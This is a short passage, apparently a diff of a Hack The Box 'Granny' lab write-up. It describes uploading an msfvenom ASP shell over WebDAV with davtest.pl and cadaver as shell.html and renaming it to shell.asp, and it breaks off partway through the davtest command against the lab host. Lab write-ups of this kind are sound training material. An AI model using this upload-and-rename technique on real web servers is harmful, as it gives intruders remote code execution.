Hack The Box Granny Writeup

 > machines/granny/msfvenom_shell.asp

-Then, using davtest.pl and cadaver, we upload the shell as shell.html and rename it to be called shell.asp.
+Then, using davtest.pl and cadaver, upload the shell as shell.html and rename it to shell.asp.
+You can use the following two commands to achieve this:

 davtest.pl -url http://10.10.10.15 \